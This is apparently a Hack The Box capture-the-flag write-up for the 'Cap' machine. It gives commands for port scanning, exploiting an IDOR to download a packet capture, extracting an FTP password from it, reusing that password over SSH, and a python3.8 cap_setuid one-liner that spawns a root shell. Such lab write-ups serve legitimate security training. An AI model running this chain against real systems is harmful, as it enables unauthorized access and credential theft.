🎩 HTB Cap — Solution Notes

Platform: Hack The Box Machine: Cap OS: Linux (Ubuntu 20.04) Difficulty: Easy Date: March 27, 2026

🗺️ Attack Chain

Nmap → Web recon → IDOR (/data/0) → Download PCAP → FTP credentials → SSH → Linux Capabilities → ROOT

🧠 How Does a Hacker Think? — Before You Begin

When starting a machine, the first question should be: "How many doors are open and which one is the weakest?"

1️⃣ Reconnaissance

Port Scanning

bash

nmap -p- --min-rate 5000 -sV 10.129.243.146

Findings:

3 ports: FTP, SSH, and HTTP. HTTP is likely the main entry point. But don't forget FTP — FTP is unencrypted, so if traffic is captured, credentials are visible in plain text.

🧠 How Does a Hacker Think? — First Look at a Web Application

When you see a web application, do two things immediately:

2️⃣ Web Application Discovery

The homepage presents a panel called "Security Dashboard." The username Nathan is visible in the top right corner. The menu has several endpoints:

• / → Dashboard
• /capture → Security Snapshot (5-second PCAP + analysis)
• /ip → IP Config
• /netstat → Network Status

Visiting the /capture endpoint redirects to:

http://10.129.243.146/data/1

💡 What does this mean?

3️⃣ IDOR Vulnerability

💡 What is IDOR (Insecure Direct Object Reference)?

bash

curl -s http://10.129.243.146/data/0 | grep -i "download" # Output: /download/0 button found

Downloading the PCAP

bash

curl -s http://10.129.243.146/download/0 -o scan0.pcap

🧠 How Does a Hacker Think? — What Are We Looking for in a PCAP?

You have a network traffic capture. So what are you looking for?

4️⃣ PCAP Analysis — Finding Credentials

💡 What is a PCAP?

bash

tcpdump -r scan0.pcap -A | grep -i "pass\|user\|login\|ftp"

Credentials found:

USER: nathan PASS: Buck3tH4TF0RM3!

5️⃣ SSH Login

💡 Why Did the FTP Password Work for SSH Too?

bash

ssh nathan@10.129.243.146 # Password: Buck3tH4TF0RM3!

🚩 User Flag

bash

cat ~/user.txt

🧠 How Does a Hacker Think? — How Do We Get to Root?

You're in as nathan. Now think systematically about getting to root:

6️⃣ Privilege Escalation — Linux Capabilities

💡 What are Linux Capabilities?

Scan for Capabilities on the System

💡 The getcap Command

bash

getcap -r / 2>/dev/null

Output:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip ← DANGEROUS! /usr/bin/ping = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep /usr/bin/mtr-packet = cap_net_raw+ep

/usr/bin/python3.8 has cap_setuid. If we call os.setuid(0) in Python, we set our UID to 0 (root). Then os.system("/bin/bash") opens a root shell.

Root Shell

bash

python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

bash

id # uid=0(root) gid=1000(nathan) groups=1000(nathan)

uid=0(root) — We're root! Even though gid still shows nathan, uid=0 means we have full root privileges.

🚩 Root Flag

bash

cat /root/root.txt

📚 Concepts Learned

• IDOR: Changing an ID in the URL to access another user's data
• PCAP Analysis: Extracting credentials from unencrypted protocols (FTP)
• Password Reuse: The same password working across multiple services
• Linux Capabilities: Escalating to UID 0 using cap_setuid
• getcap -r /: Listing dangerous capabilities on the system

🔑 General Hacker Mindset Summary

1. Question every number in a URL: If there's an ID, there might be IDOR — change it and test.
2. Watch for unencrypted protocols: FTP, HTTP, or Telnet traffic may expose credentials in plain text.
3. Password reuse is real: When you find a password, try it everywhere.
4. Capabilities can be dangerous: Run getcap, and if you see cap_setuid — exploit it immediately.
5. Systematic privesc: sudo → SUID → capabilities → cron → writable files — follow the order.